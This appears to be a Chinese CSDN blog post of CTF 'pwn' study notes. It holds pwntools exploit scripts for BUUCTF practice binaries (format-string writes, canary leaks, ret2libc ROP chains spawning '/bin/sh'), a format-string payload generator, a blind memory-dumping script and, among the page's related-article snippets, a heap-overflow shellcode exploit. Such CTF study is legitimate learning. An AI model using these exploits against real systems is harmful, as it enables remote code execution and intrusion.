pwn学习(二)

最新推荐文章于 2024-05-13 13:08:12 发布
最新推荐文章于 2024-05-13 13:08:12 发布
阅读量836 收藏 3
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37439229/article/details/108896030
版权

今天主要刷了点题,学到个格式化字符串泄漏cancary
fm

from pwn import *
#p = process('./main')
p = remote('node3.buuoj.cn',28633)
payload = '%4c%13$n' + p32(0x804a02c)
p.send(payload)
#print(p.recv())
p.interactive()

格式化字符串覆盖小数字
jarvisoj_tell_me_something

from pwn import *
p = remote('node3.buuoj.cn',26141)
payload = 'a' * (0x88) + p64(0x400620)
p.send(payload)
p.interactive()

没什么特别的就是基本rop
jarvisoj_level4

from pwn import *

p = remote('node3.buuoj.cn',26167)
elf = ELF('./main')
libc = ELF('./libc6-i386_2.23-0ubuntu10_amd64.so')
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']

payload1 = 'a' *(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.send(payload1)
sh = u32(p.recv(4))
print(hex(sh))
libcbase = sh - libc.sym['write']
sym_addr = libcbase + libc.sym['system']
sh_addr =  libcbase + libc.search('/bin/sh').next()
payload2 = 'a' *(0x88+4) + p32(sym_addr)  + p32(main_addr) + p32(sh_addr)
p.send(payload2)

p.interactive()

bjdctf_2020_babystack2

```from pwn import *
p = process('./main')
p = remote('node3.buuoj.cn',25899)
p.recvuntil('name:')
p.sendline('-1')
back_door = 0x400726
payload = 'a' * (0x10+8) + p64(back_door)
p.send(payload)
p.interactive()

jarvisoj_level3_x64

from pwn import *
p =process('./main')
libc =ELF('./libc6_2.23-0ubuntu10_amd64.so')
p = remote('node3.buuoj.cn',25740)
elf =ELF('./main')
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']
pop_rdi_addr = 0x4006b3
pop_rsi_addr = 0x4006b1
p.recvuntil(':\n')
#gdb.attach(p)
payload = 'a' *(0x80+8) + p64(pop_rdi_addr) + p64(1)+p64(pop_rsi_addr) + p64(write_got)+p64(8)+p64(write_plt) + p64(main_addr)
p.send(payload)
leak = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print(hex(leak))
libcbase = leak - libc.sym['write']
sym_addr = libcbase + libc.sym['system']
sh_addr = libcbase + libc.search('/bin/sh').next()
payload1 = 'a' *(0x80+8) + p64(pop_rdi_addr) + p64(sh_addr) + p64(sym_addr)
p.send(payload1)

p.interactive()

记住64位传参rdi rsi rdx…老是压栈艾。。。
picoctf_2018_rop chain
正如标题所说。。

from pwn import *
p = process('./main')
p = remote('node3.buuoj.cn',28603)
elf = ELF('./main')
w1_addr = 0x80485cb
w2_addr = 0x80485d8
flag_addr = 0x804862b
#gdb.attach(p)
main_addr = 0x8048714
payload = 'a'*(0x18+4) +p32(w1_addr) + p32(main_addr)
p.recvuntil('input> ')
p.sendline(payload)
payload2 = 'a'*(0x18 + 4) + p32(w2_addr) + p32(main_addr) + p32(0xbaaaaaad)
p.recvuntil('input> ')
p.sendline(payload2)
payload3 = 'a'*(0x18+4) + p32(flag_addr) + p32(main_addr) + p32(0xdeadbaad)
p.recvuntil('input> ')
p.sendline(payload3)
p.interactive()

bjdctf_2020_babyrop2
这道题让我学到很多
首先什么是canary保护,就是rbp前的一个数xor不为0就是栈溢出,而格式化字符串可以泄露这个数因此栈溢出

from pwn import *
p = remote('node3.buuoj.cn',29729)
#p = process('./main')
libc = ELF('./libc6_2.23-0ubuntu10_amd64.so')
elf = ELF('./main')
put_plt = elf.plt['puts']
put_got = elf.got['puts']
addr = 0x400887
payload = '%7$p'
p.recvuntil('help u!')
p.sendline(payload)
p.recvuntil('0x')
canary = int(p.recv(16),16)
print(hex(canary))
p.recvuntil('story!')
payload1 = p64(canary).rjust(0x20,'a')+'b'*8+p64(0x400993)+p64(put_got)+p64(put_plt) +p64(addr) 
p.send(payload1)
leak = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print(hex(leak))
libcbase = leak - libc.sym['puts']
sym_addr = libcbase + libc.sym['system']
sh_addr = libcbase + libc.search('/bin/sh').next()
payload2 = p64(canary).rjust(0x20,'a')+'b'*8+p64(0x400993)+p64(sh_addr)+p64(sym_addr) + p64(addr)
p.send(payload2)
p.interactive()
p.interactive()

ctf-wiki学习
利用%x来获取对应栈的内存,但建议使用%p,可以不用考虑位数的区别。
利用%s来获取变量所对应地址的内容,只不过有零截断。
利用%order x 来 获 取 指 定 参 数 的 值 , 利 用 x来获取指定参数的值,利用%order xs来获取指定参数对应地址的内容
%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量
覆盖内存

...[overwrite addr]....%[overwrite offset]$n

覆盖小数字

aa%k$nxx+地址

覆盖大数字

hh 对于整数类型,printf期待一个从char提升的int尺寸的整型参数。
h  对于整数类型,printf期待一个从short提升的int尺寸的整型参数。
我们可以利用%hhn向某个地址写入单字节,利用%hn向某个地址写入双字节
def fmt(prev, word, index):
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr


def fmt_str(offset, size, addr, target):
    payload = ""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload
payload = fmt_str(6,4,0x0804A028,0x12345678)

64位程序格式化字符串漏洞

感觉和32位没啥区别,只不过由于是寄存器传参gdb下调试后的位移加5
hijack GOT
这个之前做过,那时还不会。忘记是哪道题了,草。。



确定函数 A 的 GOT 表地址。

    这一步我们利用的函数 A 一般在程序中已有,所以可以采用简单的寻找地址的方法来找。

确定函数 B 的内存地址

    这一步通常来说,需要我们自己想办法来泄露对应函数 B 的地址。

将函数B的内存地址写入到函数 A 的 GOT 表地址处。

    这一步一般来说需要我们利用函数的漏洞来进行触发。一般利用方法有如下两种
        写入函数:write 函数。
        ROP
        格式化字符串任意地址写

hijack retaddr

确定偏移
获取函数的 rbp 与返回地址
根据相对偏移获取存储返回地址的地址
将执行 system 函数调用的地址写入到存储返回地址的地址。

堆的没学还不会,之后在说
格式化字符串盲打

确定程序的位数
确定漏洞位置
利用

##coding=utf8
from pwn import *

##context.log_level = 'debug'
ip = "127.0.0.1"
port = 9999


def leak(addr):
    # leak addr for three times
    num = 0
    while num < 3:
        try:
            print 'leak addr: ' + hex(addr)
            sh = remote(ip, port)
            payload = '%00008$s' + 'STARTEND' + p64(addr)
            # 说明有\n,出现新的一行
            if '\x0a' in payload:
                return None
            sh.sendline(payload)
            data = sh.recvuntil('STARTEND', drop=True)
            sh.close()
            return data
        except Exception:
            num += 1
            continue
    return None

def getbinary():
    addr = 0x400000
    f = open('binary', 'w')
    while addr < 0x401000:
        data = leak(addr)
        if data is None:
            f.write('\xff')
            addr += 1
        elif len(data) == 0:
            f.write('\x00')
            addr += 1
        else:
            f.write(data)
            addr += len(data)
    f.close()
getbinary()

ctf-wiki给的很多

20000s
关注
专栏目录
PWN入门系列(2)ROP
小心信科理化声
12-03 742
PWN入门系列(2)ROP 基本ROP 在上一篇博客中我们介绍了在ELF文件经过checksec查看保护措施后,有一个叫做NX的保护措施,即数据执行保护,在此保护措施开启后,很难直接向栈或者堆上直接注入代码,所以攻击者得想办法绕过NX的保护机制,而ROP(Return Oriented Programming)就是主要的绕过措施,主要的思想是在栈缓冲溢出的基础上,利用程序中已经有的小片段,也被称作(gadgets)来改变某些寄存器或者变量的值,进而达到控制程序的执行流程。那么什么是gadgets呢? gad
PWN入门学习
qq_20254219的博客
10-20 2504
基础PWN知识入门 进制基础 ​ 从C源代码到可执行文件的生成过程 ​ 可执行文件广义上的可执行文件,文件本身是没有执行权限的,和用户权限无关。可以通过命令给文件赋权。 ELF的执行​ 需要将在磁盘上的程序载入内存中。 在磁盘中的是节,映射到内存就是段。 在执行过程中,存储在磁盘中具有相同权限的节会被映射到内存中合成一个段。进程虚拟地址空间​ 操作系统管理所有硬件,程序
【CTF MISC】pyc文件反编译到Python源码-2017世安杯CTF writeup详解
weixin_30654583的博客
03-27 2148
1、题目 Create-By-SimpleLab 适合作为桌面的图片 首先是一张图片,然后用StegSolve进行分析,发现维码 扫码得到一串字符 03F30D0A79CB05586300000000000000000100000040000000730D0000006400008400005A000064010053280200000063000000000300000016000...
【misc | CTF】攻防世界 适合作为桌面
weixin_46301214的博客
01-27 696
看后缀名知道是 .pyt文件,是Python编译后的东西,所以就采用反编译,看看源代码是什么。可能只能靠联想,靠经验,脑洞了吧。查了一下,发现只有 .pyc 这个东西,是一个编译后的进制文件格式。再了解会发现其实隐写术有很多种,可以通过像素,光影,颜色等隐血进去。拿到这张图片,不可能扔进ps会有多图层,普通图片也就一个图层而已。有点古典密码学的味道了,不知道解密算法的情况下应该是不可能破解的。调整隐写样式,其中会有一个维码是能扫出来的。自己new一个大小,粘贴进去,选择16进制。
[CTF-Misc攻防世界]适合作为桌面
最新发布
2302_76688540的博客
05-13 383
发现flag是py文件,那么应该是使用了py编译,那我们将其保存下。发现一串十六进制的密码,那我们使用010创建新文件。我们使用stegsolve去查看这个图片。发现维码,我们使用CQR来查看图片。下载uncompyle6模块。我们下载后解压,查看图片。打开保存文件,查看文件。
【攻防世界-misc】适合作为桌面
weixin_73625393的博客
11-23 425
只截图维码区域,用工具QR Research打开截图维码,进行解码,如果不成功多次尝试,截图维码,原因是因为图片中的三个大方块不清晰。会有这两个文件,点击上方文件,将它拷贝到虚拟机Windows7中,或者电脑上可以运行py脚本,直接运行就行。将字符复制到中间区域后,在右边可以看到有这个py和pyt文件,看到有pyt的话,可以知道。看到这个的话,可能需要用pyc反编译来解题,将文件另存为2.pyc至桌面,,将文件上传到该平台,得到一个py脚本,下载该文件,并解压至桌面,大小选择1就行,点击确定。
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
pwn学习-攻防世界(
qq_45653588的博客
01-18 518
文章目录0X00 pwn-1000x01 monkey0x02 stack20x03 pwn-2000x04 welpwn 0X00 pwn-100 下载文件,只开启了NX保护。 反编译一下,main函数调用了sub_40068E()函数,然后sub_40068E()函数调用了sub_40063D函数,第一个参数为v1,第个参数为200. int sub_40068E() { char v1; // [rsp+0h] [rbp-40h] sub_40063D((__int64)&v1,
pwn学习】堆溢出()- First Fit
Morphy_Amo的博客
01-09 929
glibc堆管理中的First Fit机制
PWN学习
csdn159357258456的博客
03-24 383
在程序运行过程中,堆可以提供动态分配的内存,允许程序申请大小未知的内存。堆其实就是程序虚拟地址空间的一块连续的线性区域,它由低地址向高地址方向增长。我们一般称管理堆的那部分程序为堆管理器。响应用户的申请内存请求,向操作系统申请内存,然后将其返回给用户程序。同时,为了保持内存管理的高效性,内核一般都会预先分配很大的一块连续的内存,然后让堆管理器通过某种算法管理这块内存。只有当出现了堆空间不足的情况,堆管理器才会再次与操作系统进行交互。管理用户所释放的内存。
攻防世界misc 适合作为桌面
qq_55011640的博客
03-23 5809
首先放入010查看和Linux里面binwalk都没有发现有用的信息,就把图片放在Stegsolve里面随便操作一下就发现了维码: 在线网站:https://jiema.wwei.cn/ 发现密文 03F30D0A79CB05586300000000000000000100000040000000730D0000006400008400005A000064010053280200000063000000000300000016000000430000007378000000640...
攻防世界 Misc 适合作为桌面
MrTreebook的博客
03-12 1398
攻防世界 Misc 适合作为桌面1.binwalk看是否有隐藏文件2.StegSolve打开3.WinHex保存为pcy文件4.得到flag 1.binwalk看是否有隐藏文件 2.StegSolve打开 发现有一张维码 在线扫描 03F30D0A79CB05586300000000000000000100000040000000730D0000006400008400005A000064010053280200000063000000000300000016000000430000007378
【愚公系列】2021年11月 攻防世界-进阶题-MISC-048(适合作为桌面)
热门推荐
时光隧道
11-28 3万+
文章目录一、适合作为桌面、答题步骤1.stegsolve2.winhex3.uncompyle6总结 一、适合作为桌面 题目链接:https://adworld.xctf.org.cn/task/task_list?type=misc&number=1&grade=1&page=3 、答题步骤 1.stegsolve 2.winhex 这里都是十六进制,然后我们把他复制到 winhex 中,发现是 pyc 编译文件 3.uncompyle6 uncompyle6进行文件反编译
攻防世界_MISC_适合作为桌面(世安杯)write up
weixin_44624869的博客
09-03 3830
下载图片到Stegsolve打开、发现维码 使用维码扫描器扫描,并将结果在winhex中打开 在winhex里发现不是.pyc的文件头,仔细观察后发现可以ASCII码转进制(快捷键Ctrl+R),得到.pyc 保存为.pyc,反编译为.py(使用“uncompyle6 文件路径\文件名.pyc > 文件路径\文件名.py”命令) 得到脚本,运行即可得到f...
攻防世界-Misc-适合做桌面__题目解析
m0_69379426的博客
08-08 4120
首先公布一下答案: 名称: 适合作为桌面编号: GFSJ0010难度:1题目来源:题目描述: flag格式为flag{xxxx}题目附件:单纯从图片观察,未发现线索;右键使用记事本打开,依然未发现 字样;图片隐写:在ctf比赛中,misc方向是必考的一个方向,其中,图片隐写也是最常见的题目类型启动 ,加载图片; stegsolve需要依赖Java环境,自行配置,下载下了的文件为jar,目录下cmd的输入 java -jar jar文件名 切换图片->,
攻防世界中MISC 适合作为桌面题
weixin_46954909的博客
05-24 613
攻防世界 MISS 适合作为桌面题
攻防世界 适合作为桌面
qq_42201260的博客
10-08 423
下载完附件,打开一张图片。。丢到Stegsolve.jar看看,发现有个维码,那微信扫下,有一串16进制数字 丢到winhex里另纯为成.pyc文件,进行反编译下,就得到python代码,跑下就有flag值了 ...
攻防世界-适合作为桌面
weixin_49539962的博客
08-14 182
其实这里已经看到flag了,不过还是下载下来运行。放入winhex内后查看文件头,是pyc文件。pyc文件是python的进制文件。保存为pyc文件,不过pyc是进制文件,需要反编译我们才能看懂,kali里使用binwalk试一试能不能拆分文件,结果不能。下面用stegsolve查看是否隐写。调整通道发现维码。
攻防世界适合作为桌面
淡巴枯的博客
10-08 1134
【代码】攻防世界适合作为桌面。
from pwn import * context(log_level='debug',os='linux',arch='amd64') # p=process('./1') p =remote("59.110.164.72",10025) elf=ELF('./1') shellcode = asm(shellcraft.sh()) # gdb.attach(p,"b *0x400a28") # pause() payload1 =b"\x00"*24 p.sendafter(b"Start injecting\n",payload1) p.recvuntil(b"materials\n") heap_addr = int(p.recv(8),10) print (heap_addr) # heap_addr =int((heap_addr),16) print (hex(heap_addr)) sleep(0.1) p.sendline(str(-1)) #change top_chunk sleep(0.1) p.sendline(str(6296200-heap_addr)) #get_size p.sendafter(b"Answer time is close to over\n","a"*0x10) # gdb.attach(p,"b *0x400b49") # pause() payload2= b"a"*0x60+p64(0x6012a0+0x80+0x120)+p64(0x4008e3)+b"a"*0x10+\ p64(0x6012a0+0x60)+p64(0x400914)+shellcode p.sendafter(b"irect to destination\n",payload2) p.recvuntil(b"you pass") # sleep() p.recv(0x1b0) sleep(0.5) stack = u64(p.recvuntil(b"\x7f").ljust(8,b"\x00"))-0xd0 print(hex(stack)) # gdb.attach(p,"b *0x4008e3") # pause() payload3 = b"a"*0x68+p64(stack) p.sendline(payload3) p.interactive()这串代码的知识点和用处
06-01
这段代码是针对一个名为“materials”的程序进行的攻击,该程序存在堆溢出漏洞和栈溢出漏洞。攻击的目的是获取程序的最高权限,实现远程代码执行。 代码中使用了pwntools库,主要实现了以下功能: 1. 构造堆溢出payload,通过修改堆块头部实现伪造chunk。具体地,构造了两个chunk,第一个chunk大小设为负数,通过修改top_chunk的方式使其指向第个chunk的头部。第个chunk的大小设为目标位置(0x6012a0+0x80+0x120)与堆基址的差值,即让其覆盖到目标位置上。然后在第个chunk的尾部构造ROP链实现远程代码执行。 2. 获取栈地址,利用栈溢出漏洞,将ROP链的返回地址修改为栈上的地址,从而在返回时跳转到栈上执行代码。 总的来说,这段代码主要是利用了堆溢出和栈溢出漏洞,通过构造payload实现远程代码执行的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值